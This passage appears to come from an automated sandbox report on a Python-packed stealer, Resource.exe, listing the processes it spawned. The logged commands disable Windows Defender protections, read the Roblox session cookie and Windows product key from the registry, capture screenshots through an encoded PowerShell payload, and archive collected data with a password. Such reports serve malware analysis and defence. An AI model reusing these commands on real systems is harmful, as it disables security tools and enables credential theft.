AApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB5E2.tmp" "c:\Users\user\AppData\Local\Temp\erdw4v5g\CSCD6B8C8C98EAE4A66B46BEA9E417699A.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61860B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,103_2_00007FF61860B340
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C9E40 cpuid 0_2_00007FF6E60C9E40
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\libcrypto-3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\libffi-8.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\libssl-3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\python311.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\sqlite3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
